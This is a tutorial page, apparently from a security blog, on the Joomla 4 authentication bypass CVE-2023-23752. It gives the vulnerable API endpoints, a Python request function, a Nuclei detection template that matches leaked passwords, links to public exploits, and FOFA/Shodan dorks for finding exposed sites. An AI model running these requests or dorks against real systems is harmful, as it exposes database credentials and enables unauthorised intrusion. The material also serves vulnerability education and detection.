> For the complete documentation index, see [llms.txt](https://anekant-singhais-organization.gitbook.io/why-so-script-kiddie/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://anekant-singhais-organization.gitbook.io/why-so-script-kiddie/cve-explained-cve-2023-23752.md).

# CVE Explained: CVE-2023-23752

* references:

  * Read: [vulncheck](https://vulncheck.com/blog/joomla-for-rce) and [Pingsafe](https://www.pingsafe.com/blog/cve-2023-23752-joomla-authentication-bypass-vulnerability/)
  * Exploit: [Ruby](https://github.com/Acceis/exploit-CVE-2023-23752)  and [Python](https://github.com/Anekant-Singhai/Exploits/blob/master/CVE-2023-23752/CVE-2023-23752.py)
  * Video with Nuclei template: [Here](https://www.youtube.com/watch?v=8KUSPNpoozg)

  ## Exploitation {POC}:

  CVE-2023-23752 is an authentication bypass resulting in an information leak. Most of the public exploits use the bypass to leak the system's configuration, which contains the Joomla! MySQL database credentials in plaintext. Exploit was that whenever the user was visiting the joomla root-url where the server was running and appending this endpoint :

  ```
  {root-url}/api/index.php/v1/config/application?public=true
  ```

  and:

  ```
  {root-url}/api/index.php/v1/users?public=true
  ```

<figure><img src="/files/8Zn3A0goeeJCcyxyyyxT" alt=""><figcaption></figcaption></figure>

## Exploit Development

We send the request to these endpoints and get the response.

```python
def send_request(url):
    try:
        headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0'}
        response1 = requests.get(url+"api/index.php/v1/config/application?public=true")
        response1.raise_for_status()  # Raise an HTTPError for bad responses
        if response1.status_code == 404:
            response2 = requests.get(url + '/api/index.php/v1/users?public=true')
            response2.raise_for_status()
            return response2.text
        else:
            response1.raise_for_status()
            return response1.text
    except requests.RequestException as e:
        print(f"Error in sending request: {e}")
        return None

```

The whole exploit: [Anekant](https://github.com/Anekant-Singhai/Exploits/tree/master/CVE-2023-23752)

```
id: CVE-2023-23752

info:
  name: CVE-2023-23752-joomla
  author: badboycxcc
  severity: info
  description: description
  reference:
    - https://cve.report/CVE-2023-23752
  tags: CVE-2023-23752

requests:
  - raw:
      - |+
        GET /api/index.php/v1/config/application?public=true HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
        Connection: close
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "password"
          
      - type: word
        part: body
        words:
          - "attributes"

      - type: status
        status:
          - 200
```

Template is acquired from [this](https://github.com/projectdiscovery/nuclei-templates/issues/6762) github commit by [badboycc](https://github.com/badboycxcc).

## Dorks

FOFA

```
app="Joomla-4"
```

SHODAN

```
product="Joomla-4"
```
